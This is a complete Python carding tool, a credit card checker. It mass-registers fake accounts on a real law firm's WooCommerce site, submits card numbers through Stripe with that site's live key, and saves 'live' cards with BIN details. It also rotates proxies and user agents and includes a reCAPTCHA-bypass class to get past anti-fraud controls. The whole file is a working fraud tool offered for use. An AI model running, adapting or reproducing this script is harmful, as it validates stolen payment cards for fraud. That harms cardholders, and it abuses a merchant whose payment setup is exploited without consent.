from __future__ import annotations
import requests,os,sys,time,uuid,string,random,base64,secrets,platform,re,json,threading,subprocess,traceback,hashlib
from pathlib import Path
from threading import Lock
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
import urllib3
from urllib3.exceptions import InsecureRequestWarning
urllib3.disable_warnings(InsecureRequestWarning)
from typing import Optional, List, Dict, Tuple, Any
from enum import Enum, auto
from urllib.parse import parse_qsl, urlencode
from requests.exceptions import (
    ProxyError,
    SSLError,
    ConnectionError,
    Timeout,
    HTTPError,
    TooManyRedirects,
    ChunkedEncodingError,
    ContentDecodingError,
    InvalidURL,
    InvalidSchema,
    RequestException,
)
import socket

try:
    from faker import Faker
    from http.cookiejar import LWPCookieJar
    from colorama import Fore, Style, init
    from user_agent import generate_user_agent, generate_navigator
    init(autoreset=True)

except ImportError:
    os.system("pip install requests faker colorama user-agent cookiejar")
    os.system("python -m pip install requests faker colorama user-agent cookiejar")

    from faker import Faker
    from http.cookiejar import LWPCookieJar
    from colorama import Fore, Style, init
    from user_agent import generate_user_agent, generate_navigator
    init(autoreset=True)



RESET = "\033[0m"
WHITE = "\033[97m"
GRAY = "\033[90m"
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"


def safe_exit(code=1):
    try:
        os._exit(code)
    except Exception:
        sys.exit(code)


print_lock = Lock()
def safe_print(*args, **kwargs):
    with print_lock:
        print(*args, **kwargs)


def parse_proxy(proxy_input: str):
    proxy_input = proxy_input.strip()

    if not proxy_input:
        return None

    if not proxy_input.startswith(("http://", "https://")):
        proxy_input = "http://" + proxy_input

    try:
        scheme, rest = proxy_input.split("://", 1)
        host_port, user, password = rest.rsplit(":", 2)
        host, port = host_port.split(":", 1)

        proxy_url = f"{scheme}://{user}:{password}@{host}:{port}"
        return {
            "http": proxy_url,
            "https": proxy_url
        }
    except ValueError:
        raise ValueError("proxy format not recognized")

def run():
    MAX_WORKERS = 7

    try:
        os.system("cls" if os.name == "nt" else "clear")

        proxy_input = input(
            "Enter proxy (ip:port:user:pass | http://ip:port:user:pass)\n"
            f"{Fore.RED}[+]{Style.RESET_ALL} Leave blank for no proxy: "
        ).strip()

        try:
            PROXY = parse_proxy(proxy_input)
            if PROXY:
                print(f"{Fore.RED}[+]{Style.RESET_ALL} Proxy loaded: {PROXY['http']}")
            else:
                print(f"{Fore.RED}[+]{Style.RESET_ALL} No proxy used")
        except Exception as e:
            print(f"{Fore.RED}[!]{Style.RESET_ALL} Proxy error: {e}")
            return

        combo_path = input(f"{Fore.RED}[+]{Style.RESET_ALL} Enter combo file path (.txt, utf-8): ").strip().strip('"')
        if not combo_path:
            print("Location path not found .")
            return

        if not os.path.isfile(combo_path):
            print("File not found.")
            return

        if not combo_path.lower().endswith(".txt"):
            print("File must .txt")
            return

        try:
            with open(combo_path, "r", encoding="utf-8", errors="strict") as f:
                lines = [line.strip() for line in f if line.strip()]
        except UnicodeDecodeError:
            print("File must UTF-8.")
            return
        except Exception as e:
            print(f"Error while opening file: {e}")
            return

        if not lines:
            print("File not found.")
            return

        total = len(lines)
        print(f"\nLoaded {total} cards")
        print(f"Running with {MAX_WORKERS} threads...\n")

        ok_count = 0
        fail_count = 0

        with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
            futures = []
            for line in lines:
                # kirim proxy ke worker
                futures.append(executor.submit(checkzzz, line, PROXY))

            for future in as_completed(futures):
                try:
                    result = future.result()
                    if result is True:
                        ok_count += 1
                    else:
                        fail_count += 1
                except Exception as e:
                    fail_count += 1

        author = "KianSantang"

        width = 36
        line = "═" * width

        summary = f"""
        {Fore.WHITE}╔{line}╗
        ║{"RESULT".center(width)}║
        ║{Fore.YELLOW}{('Author: ' + author):^{width}}{Fore.WHITE}║
        ╠{line}╣
        ║ {Fore.CYAN}{"Total".ljust(12)} {Fore.YELLOW}: {Fore.WHITE}{str(total).rjust(15)}     ║
        ║ {Fore.GREEN}{"Live".ljust(12)}{Fore.YELLOW} : {Fore.WHITE}{str(ok_count).rjust(15)}     ║
        ║ {Fore.RED}{"Declined".ljust(12)}{Fore.YELLOW} : {Fore.WHITE}{str(fail_count).rjust(15)}     ║
        ╚{line}╝{Style.RESET_ALL}
        """

        print(summary)

    except KeyboardInterrupt:
        print("\nDihentikan oleh user.")
    except Exception as e:
        print(f"FATAL ERROR: {e}")


def gstr(src, a, b):
    try:
        return src.split(a, 1)[1].split(b, 1)[0]
    except Exception:
        return ""


class RecaptchaSolver:
    _BASE = "https://www.google.com/recaptcha"
    _HEADERS = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": (
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
            "AppleWebKit/537.36 (KHTML, like Gecko) "
            "Chrome/120.0.0.0 Safari/537.36"
        )
    }

    _RE_API = re.compile(r"(api2|enterprise)/anchor\?(.*)")
    _RE_C = re.compile(r'value="([^"]+)"')
    _RE_TOKEN = re.compile(r'"rresp","([^"]+)"')

    def __init__(self, proxies: Optional[List[str]] = None, cookie_file: str = "cookies.txt") -> None:
        self.proxies = proxies or []
        self.cookie_file = cookie_file
        self.cookie_jar = LWPCookieJar(cookie_file)
        self.session = requests.Session()
        self.session.headers.update(self._HEADERS)
        try:
            self.cookie_jar.load(ignore_discard=True)
            for c in self.cookie_jar:
                self.session.cookies.set_cookie(c)
        except FileNotFoundError:
            pass

    def solve(self, anchor_url: str) -> str:
        api, params = self._parse(anchor_url)
        proxy = self._choose_proxy()
        anchor_html = self._get(f"{self._BASE}/{api}/anchor", params=params, proxy=proxy)
        c_value = self._extract(self._RE_C, anchor_html, "c_value")
        self._last_params = params
        self._last_c = c_value
        payload = self._payload(params, c_value)
        reload_html = self._post(f"{self._BASE}/{api}/reload", params={"k": params["k"]}, data=payload, proxy=proxy)
        for c in self.session.cookies:
            self.cookie_jar.set_cookie(c)
        self.cookie_jar.save(ignore_discard=True)
        return self._extract(self._RE_TOKEN, reload_html, "token")

    def solve_any(self, url: str) -> str:
        if "/anchor" in url:
            return self.solve(url)
        elif "/reload" in url:
            params = dict(parse_qsl(url.split("?")[1]))
            k = params.get("k")
            if not k:
                raise ValueError("Missing site key in reload URL")
            if not hasattr(self, "_last_params") or not hasattr(self, "_last_c"):
                raise ValueError("Reload URL provided without prior anchor context.")
            proxy = self._choose_proxy()
            payload = self._payload(self._last_params, self._last_c)
            reload_html = self._post(url, params={"k": k}, data=payload, proxy=proxy)
            return self._extract(self._RE_TOKEN, reload_html, "token")
        else:
            raise ValueError("Unsupported URL type — must contain /anchor or /reload")

    def _parse(self, url: str) -> Tuple[str, dict]:
        m = self._RE_API.search(url)
        if not m:
            raise ValueError("Invalid anchor URL")
        api = m.group(1)
        params = dict(parse_qsl(m.group(2)))
        for k in ("k", "v", "co"):
            if k not in params:
                raise ValueError(f"Missing param: {k}")
        return api, params

    @staticmethod
    def _payload(p: dict, c: str) -> str:
        return urlencode({
            "v": p["v"],
            "reason": "q",
            "c": c,
            "k": p["k"],
            "co": p["co"],
        })

    @staticmethod
    def _extract(regex: re.Pattern, text: str, name: str) -> str:
        m = regex.search(text)
        if not m:
            raise ValueError(f"Failed to extract {name}")
        return m.group(1)

    def _choose_proxy(self) -> Optional[dict]:
        if not self.proxies:
            return None
        proxy_url = random.choice(self.proxies)
        return {"http": proxy_url, "https": proxy_url}

    def _get(self, url: str, params: dict, proxy: Optional[dict], retry: int = 3) -> str:
        last_exception: Optional[Exception] = None
        for _ in range(retry):
            try:
                r = self.session.get(url, params=params, proxies=proxy, timeout=10)
                r.raise_for_status()
                return r.text
            except Exception as e:
                last_exception = e
                time.sleep(0.5 + random.random())
        raise RuntimeError(f"GET failed after {retry} attempts: {last_exception}")

    def _post(self, url: str, params: dict, data: str, proxy: Optional[dict], retry: int = 3) -> str:
        last_exception: Optional[Exception] = None
        for _ in range(retry):
            try:
                r = self.session.post(url, params=params, data=data, proxies=proxy, timeout=10)
                r.raise_for_status()
                return r.text
            except Exception as e:
                last_exception = e
                time.sleep(0.5 + random.random())
        raise RuntimeError(f"POST failed after {retry} attempts: {last_exception}")


class FlowResult(Enum):
    LIVE = auto()
    LIVE_CCN = auto()
    DECLINED = auto()
    THREE_DS = auto()
    UNKNOWN = auto()

class ResponseNormalizer:
    @staticmethod
    def normalize(resp: Any) -> Dict[str, Any]:
        if not isinstance(resp, dict):
            return {}

        data = resp.get("data")
        if isinstance(data, dict):
            return data

        return resp


class StripeFlow:
    def __init__(self, session=None, Auswitch: str = "Mozilla/5.0"):
        self.session = session or requests.Session()
        self.Auswitch = Auswitch

    def _clean(self, s: Optional[str]) -> str:
        s = (s or "UNKNOWN").strip()
        while "  " in s:
            s = s.replace("  ", " ")
        return s

    def _get_bin_info(self, bincc: str) -> str:
        try:
            headers = {
                'User-Agent': self.Auswitch,
                'Accept': 'application/json',
                'Accept-Version': '3'
            }

            r = self.session.get(
                f'https://binlist.io/lookup/{bincc}',
                headers=headers,
                timeout=20,
                verify=False
            )

            data = r.json() if isinstance(r.json(), dict) else {}

            scheme = self._clean(data.get("scheme"))
            ctype = self._clean(data.get("type"))
            category = self._clean(data.get("category"))

            country = data.get("country") or {}
            alpha = self._clean(country.get("alpha3") or country.get("alpha2"))

            bank = data.get("bank") or {}
            bank_name = self._clean(bank.get("name"))

            return f"{scheme}|{ctype}|{category}|{alpha}|{bank_name}"

        except Exception:
            return "UNKNOWN|UNKNOWN|UNKNOWN|UNKNOWN|UNKNOWN"
    def handle(self, data, cc_num, mm, yy, cvv, filename: str = "live.txt") -> bool:
        global LIVE, DECLINED, ERROR, TOTAL

        intent = self._extract_intent(data)
        status = self._safe_get(intent, "status")
        next_action = intent.get("next_action") if isinstance(intent, dict) else None

        error = self._extract_error(data, intent)
        msg, reason = self._build_reason(error)

        card = f"{cc_num}|{mm}|{yy}|{cvv}"
        bincc = cc_num[:6]
        info = self._get_bin_info(bincc)



        if status == "succeeded":
            safe_print(f"{card} --> {Fore.GREEN}LIVE{Style.RESET_ALL} | Approved.")
            with open(filename, "a", encoding="utf-8") as f:
                f.write(card + f"|SUCCEEDED|{info}\n")
            return True

        if status == "succeeded" and not next_action:
            safe_print(f"{card} --> {Fore.GREEN}LIVE 200{Style.RESET_ALL} | Approved.")
            with open(filename, "a", encoding="utf-8") as f:
                f.write(card + f"|SUCCEEDED|{info}\n")
            return True

        if msg and "you cannot add a new payment method so soon" in msg.lower():
            safe_print(f"{card} --> {Fore.YELLOW}RATE_LIMIT{Style.RESET_ALL} | {msg}")
            return False

        if status == "requires_payment_method":
            return self._handle_requires_payment_method(card, cc_num, msg, reason)

        if status == ("requires_action"):
            safe_print(f"{card} --> {Fore.YELLOW}3DS{Style.RESET_ALL} | Three3ds secure")
            return False


        if error:
            self._print_declined(card, msg)
            return False


        safe_print(f"{card} --> {Fore.RED}CARD_DECLINED{Style.RESET_ALL} | {msg}")
        return False

    def _handle_requires_payment_method(
        self,
        card: str,
        cc_num: str,
        msg: Optional[str],
        reason: str,
        filename: str = "live.txt"
    ) -> bool:
        global LIVE, DECLINED, ERROR, TOTAL
        bincc = cc_num[:6]
        info = self._get_bin_info(bincc)

        if "Your card has insufficient funds." in reason or "insufficient_funds" in reason:
            safe_print(f"{card} --> {Fore.GREEN}LIVE{Style.RESET_ALL} | insufficient_funds")
            with open(filename, "a", encoding="utf-8") as f:
                f.write(card + f"|INSUFFICIENT_FUNDS|{info}\n")
            return True

        if "Your card's security code is incorrect" in reason or "incorrect_cvc" in reason:
            safe_print(f"{card} --> {Fore.GREEN}LIVE CCN{Style.RESET_ALL} | incorrect_cvc")
            with open(filename, "a", encoding="utf-8") as f:
                f.write(card + f"|CCN APPROVED|{info}\n")
            return True

        if any(k in reason for k in ("authentication", "three_d", "3d")):
            safe_print(f"{card} --> {Fore.YELLOW}3DS{Style.RESET_ALL} | Three3ds secure")
            return False


        self._print_declined(card, msg)
        return False

    @staticmethod
    def _print_declined(card: str, msg: Optional[str]) -> None:
        global LIVE, DECLINED, ERROR, TOTAL
        if msg:

            safe_print(f"{card} --> {Fore.RED}CARD_DECLINED{Style.RESET_ALL} | {msg}")
        else:
            safe_print(f"{card} --> {Fore.RED}CARD_DECLINED{Style.RESET_ALL}")

    @staticmethod
    def _extract_intent(data: Any) -> Dict[str, Any]:
        if not isinstance(data, dict):
            return {}

        error = data.get("error")
        if isinstance(error, dict):
            for key in ("payment_intent", "setup_intent"):
                if isinstance(error.get(key), dict):
                    return error[key]

        for key in ("payment_intent", "setup_intent", "data"):
            if isinstance(data.get(key), dict):
                return data[key]

        return data

    @staticmethod
    def _extract_error(
        data: Any,
        intent: Dict[str, Any],
    ) -> Optional[Dict[str, Any]]:

        if isinstance(data, dict):
            inner = data.get("data")
            if isinstance(inner, dict):
                err = inner.get("error")
                if isinstance(err, dict):
                    return err

        if isinstance(data, dict):
            err = data.get("error")
            if isinstance(err, dict):
                return err

        if isinstance(intent, dict):
            for key in ("last_payment_error", "last_setup_error"):
                err = intent.get(key)
                if isinstance(err, dict):
                    return err

        return None

    @staticmethod
    def _build_reason(
        err: Optional[Dict[str, Any]]
    ) -> Tuple[Optional[str], str]:

        if not isinstance(err, dict):
            return None, ""

        msg = err.get("message") if isinstance(err.get("message"), str) else None

        parts = []
        for key in ("decline_code", "code", "type"):
            val = err.get(key)
            if isinstance(val, str):
                parts.append(val.lower())

        return msg, " ".join(parts)

    @staticmethod
    def _safe_get(obj: Any, key: str) -> Optional[str]:
        if isinstance(obj, dict):
            val = obj.get(key)
            if isinstance(val, str):
                return val
        return None

    @staticmethod
    def _save_success(card: str, filename: str = "live.txt") -> None:
        try:
            with open(filename, "a", encoding="utf-8") as f:
                f.write(card + "\n")
        except Exception:
            pass


def parse_card(s: str):
    if not isinstance(s, str):
        return None

    s = s.strip()
    if not s:
        return None

    parts = [p.strip() for p in s.split("|")]
    if len(parts) != 4:
        return None

    cc, mm, yy, cvv = parts

    if not (cc.isdigit() and mm.isdigit() and yy.isdigit() and cvv.isdigit()):
        return None


    mm = mm.zfill(2)
    if not (1 <= int(mm) <= 12):
        return None


    if len(yy) == 2:
        yy = "20" + yy
    elif len(yy) == 3:
        yy = "2" + yy
    elif len(yy) == 1:
        yy = "200" + yy
    elif len(yy) != 4:
        return None

    return cc, mm, yy, cvv

def checkzzz(line, proxy):
    s = requests.Session()
    s.proxies = proxy

    res = parse_card(line)
    if not res:
        return

    cc, mm, yy, cvv = res

    UserAgent = generate_user_agent()


    fingerprintId = __import__("hashlib").sha256(f"{UserAgent}|{proxy or ''}".encode()).hexdigest()
    flow = StripeFlow()
    fake = Faker("en_UK")
    firstname = fake.first_name()
    lastname = fake.last_name()
    try:
        zipcode = fake.zipcode()
    except Exception:
        zipcode = fake.postcode()
    email = f"{Faker().user_name().lower()}_{secrets.token_hex(4)}@{random.choice(['gmail.com','yahoo.com','outlook.com','hotmail.com','icloud.com','proton.me','protonmail.com','live.com','msn.com','yahoo.co.id','yahoo.co.uk','yahoo.co.jp','ymail.com','rocketmail.com','live.uk','live.co.uk','live.ca','outlook.co.uk','outlook.jp','tutanota.com','tutanota.de','mailbox.org','zoho.com','zohomail.com','fastmail.com','pm.me','yandex.com','yandex.ru','mail.ru','gmx.com','gmx.de','web.de','seznam.cz','laposte.net','orange.fr','edumail.vn','student.mail','alumni.email','icousd.com','ymail.cc','byom.de','momoi.re','mailgun.co','inboxkitten.com','maildrop.cc', 'web.de', 'byom.my.id'])}"
    today = datetime.now().strftime("%Y-%m-%d")
    today1 = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    try:
        headers = {
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
            'cache-control': 'no-cache',
            'referer': 'https://google.com/',
            'pragma': 'no-cache',
            'priority': 'u=0, i',
            'user-agent': UserAgent,
        }

        r = s.get('https://www.ontier.law/en/my-account/', headers=headers)
        txt = r.text.strip()
        regnonce = gstr(txt, 'woocommerce-register-nonce" value="', '"')
        if not regnonce:
            return None

        headers = {
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'accept-language': 'en-US,en;q=0.9',
            'cache-control': 'no-cache',
            'content-type': 'application/x-www-form-urlencoded',
            'origin': 'https://www.ontier.law',
            'pragma': 'no-cache',
            'priority': 'u=0, i',
            'referer': 'https://www.ontier.law/en/my-account/',
            'user-agent': UserAgent,
        }

        data = {
            'email': email,
            'wc_order_attribution_source_type': 'organic',
            'wc_order_attribution_referrer': 'https://www.google.com/',
            'wc_order_attribution_utm_campaign': '(none)',
            'wc_order_attribution_utm_source': 'google',
            'wc_order_attribution_utm_medium': 'organic',
            'wc_order_attribution_utm_content': '(none)',
            'wc_order_attribution_utm_id': '(none)',
            'wc_order_attribution_utm_term': '(none)',
            'wc_order_attribution_utm_source_platform': '(none)',
            'wc_order_attribution_utm_creative_format': '(none)',
            'wc_order_attribution_utm_marketing_tactic': '(none)',
            'wc_order_attribution_session_entry': 'https://www.ontier.law/en/my-account/',
            'wc_order_attribution_session_start_time': today1,
            'wc_order_attribution_session_pages': '1',
            'wc_order_attribution_session_count': '1',
            'wc_order_attribution_user_agent': UserAgent,
            'woocommerce-register-nonce': regnonce,
            '_wp_http_referer': '/en/my-account/',
            'register': 'Register',
        }

        r = s.post('https://www.ontier.law/en/my-account/', headers=headers, data=data)


        headers = {
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'accept-language': 'en-US,en;q=0.9',
            'cache-control': 'no-cache',
            'pragma': 'no-cache',
            'priority': 'u=0, i',
            'referer': 'https://www.ontier.law/en/my-account-2/payment-methods/',
            'user-agent': UserAgent,
        }

        r1 = s.get('https://www.ontier.law/en/my-account-2/add-payment-method/',headers=headers)
        txt5 = r1.text.strip()
        createSetupPaymentNonce = gstr(txt5, 'createAndConfirmSetupIntentNonce":"', '"')

        headers = {
            'accept': 'application/json',
            'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
            'cache-control': 'no-cache',
            'content-type': 'application/x-www-form-urlencoded',
            'origin': 'https://js.stripe.com',
            'pragma': 'no-cache',
            'priority': 'u=1, i',
            'referer': 'https://js.stripe.com/',
            'user-agent': UserAgent,
        }

        data = {
            "type": "card",
            "card[number]": cc,
            "card[cvc]": cvv,
            "card[exp_year]": yy,
            "card[exp_month]": mm,
            "allow_redisplay": "unspecified",
            "billing_details[address][postal_code]": zipcode,
            "billing_details[address][country]": "US",
            "pasted_fields": "number,cvc",
            "payment_user_agent": "stripe.js/67c5b8132f; stripe-js-v3/67c5b8132f; payment-element; deferred-intent",
            "referrer": "https://www.ontier.law",
            "time_on_page": "83781",
            "client_attribution_metadata[client_session_id]": "d30ddaf1-b2b6-4de8-9ef7-42a4dc479cd4",
            "client_attribution_metadata[merchant_integration_source]": "elements",
            "client_attribution_metadata[merchant_integration_subtype]": "payment-element",
            "client_attribution_metadata[merchant_integration_version]": "2021",
            "client_attribution_metadata[payment_intent_creation_flow]": "deferred",
            "client_attribution_metadata[payment_method_selection_flow]": "merchant_specified",
            "client_attribution_metadata[elements_session_config_id]": "a44e48d3-f317-43e0-8be4-7e3ce067fdad",
            "client_attribution_metadata[merchant_integration_additional_elements][0]": "payment",
            "guid": "N/A",
            "muid": "N/A",
            "sid": "N/A",
            "key": "pk_live_51Rqc2I8ZDd7LF1SUQl3uDx1UNx4LUZ0x61kd0wn4q5cQnCFtikn6GaGE5bCPUxlbMhA3cmeBQG2OQhIyJS01k30r00SSJEwcgi",
            "_stripe_version": "2024-06-20",
        }

        r = s.post('https://api.stripe.com/v1/payment_methods', headers=headers, data=data)
        xcode = r.status_code
        txt4 = r.text.strip()
        id_pm = gstr(txt4, 'id": "', '"')
        if not id_pm:
            message = gstr(txt4, 'message": "', '"')
            safe_print(
                f"    {WHITE}{cc}|{mm}|{yy}|{cvv} -- "
                f"{RED}{xcode} {WHITE}-- {RED}{message}{RESET}"
            )
            return False

        headers = {
            'accept': '*/*',
            'accept-language': 'en-US,en;q=0.9',
            'cache-control': 'no-cache',
            'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'origin': 'https://www.ontier.law',
            'pragma': 'no-cache',
            'priority': 'u=1, i',
            'referer': 'https://www.ontier.law/en/my-account-2/add-payment-method/',
            'sec-ch-ua': '"Not(A:Brand";v="8", "Chromium";v="144", "Microsoft Edge";v="144"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'empty',
            'sec-fetch-mode': 'cors',
            'sec-fetch-site': 'same-origin',
            'user-agent': UserAgent,
            'x-requested-with': 'XMLHttpRequest',
        }

        data = {
            'action': 'wc_stripe_create_and_confirm_setup_intent',
            'wc-stripe-payment-method': id_pm,
            'wc-stripe-payment-type': 'card',
            '_ajax_nonce': createSetupPaymentNonce,
        }

        r33 = s.post('https://www.ontier.law/wp-admin/admin-ajax.php', headers=headers, data=data)
        xcode = r33.status_code

        txt = r33.text.strip()
        try:
            resp = r33.json()
        except ValueError:
            resp = {}

        if not isinstance(resp, dict):
            resp = {}

        success = resp.get("success")

        data_block = resp.get("data")
        if not isinstance(data_block, dict):
            data_block = {}

        status = data_block.get("status")

        error_block = data_block.get("error")
        if not isinstance(error_block, dict):
            error_block = {}

        msgx = error_block.get("message")


        if success is False and msgx:
            safe_print(
                f"    {WHITE}{cc}|{mm}|{yy}|{cvv} -- "
                f"{RED}{xcode} {WHITE}-- {RED}{msgx}{RESET}"
            )
            return False

        elif success is True and (status == "succeeded" or "succeeded" in txt.lower()):
            safe_print(
                f"    {WHITE}{cc}|{mm}|{yy}|{cvv} -- "
                f"{GREEN}{xcode} {WHITE}-- {GREEN}Card approved.{RESET}"
            )
            return True

        elif success is True and (status == "requires_action" or "requires_action" in txt.lower()):
            safe_print(
                f"    {WHITE}{cc}|{mm}|{yy}|{cvv} -- "
                f"{YELLOW}{xcode} {WHITE}-- {YELLOW}Three3ds secure.{RESET}"
            )
            return False

    except ProxyError:
        safe_print(f"{Fore.WHITE} {cc}|{mm}|{yy}|{cvv} {Fore.LIGHTWHITE_EX}-- {Fore.MAGENTA}ERROR {Fore.LIGHTWHITE_EX}--{Fore.MAGENTA} Proxy unavailable. Please replace or retry.{Style.RESET_ALL}")
        return None

    except SSLError:
        safe_print(f"{Fore.WHITE} {cc}|{mm}|{yy}|{cvv} {Fore.LIGHTWHITE_EX}-- {Fore.MAGENTA}ERROR {Fore.LIGHTWHITE_EX}--{Fore.MAGENTA} SSL handshake failed. Check HTTPS or proxy.{Style.RESET_ALL}")
        return None

    except (ConnectionError, Timeout, socket.timeout):
        safe_print(f"{Fore.WHITE} {cc}|{mm}|{yy}|{cvv} {Fore.LIGHTWHITE_EX}-- {Fore.MAGENTA}ERROR {Fore.LIGHTWHITE_EX}--{Fore.MAGENTA} Network timeout. Connection may be slow.{Style.RESET_ALL}")
        return None

    except HTTPError as e:
        safe_print(f"{Fore.WHITE} {cc}|{mm}|{yy}|{cvv} {Fore.LIGHTWHITE_EX}-- {Fore.MAGENTA}ERROR {Fore.LIGHTWHITE_EX}--{Fore.MAGENTA} HTTP {e.response.status_code}. Server rejected the request.{Style.RESET_ALL}")
        return None

    except TooManyRedirects:
        safe_print(f"{Fore.WHITE} {cc}|{mm}|{yy}|{cvv} {Fore.LIGHTWHITE_EX}-- {Fore.MAGENTA}ERROR {Fore.LIGHTWHITE_EX}--{Fore.MAGENTA} Redirect loop detected.{Style.RESET_ALL}")
        return None

    except (ChunkedEncodingError, ContentDecodingError):
        safe_print(f"{Fore.WHITE} {cc}|{mm}|{yy}|{cvv} {Fore.LIGHTWHITE_EX}-- {Fore.MAGENTA}ERROR {Fore.LIGHTWHITE_EX}--{Fore.MAGENTA} Corrupted server response.{Style.RESET_ALL}")
        return None

    except (InvalidURL, InvalidSchema):
        safe_print(f"{Fore.WHITE} {cc}|{mm}|{yy}|{cvv} {Fore.LIGHTWHITE_EX}-- {Fore.MAGENTA}ERROR {Fore.LIGHTWHITE_EX}--{Fore.MAGENTA} Invalid request URL.{Style.RESET_ALL}")
        return None

    except RequestException as e:
        safe_print(f"{Fore.WHITE} {cc}|{mm}|{yy}|{cvv} {Fore.LIGHTWHITE_EX}-- {Fore.MAGENTA}ERROR {Fore.LIGHTWHITE_EX}--{Fore.MAGENTA} Request failed: {e}{Style.RESET_ALL}")
        return None


    finally:
        s.close()


if __name__=='__main__':
    run()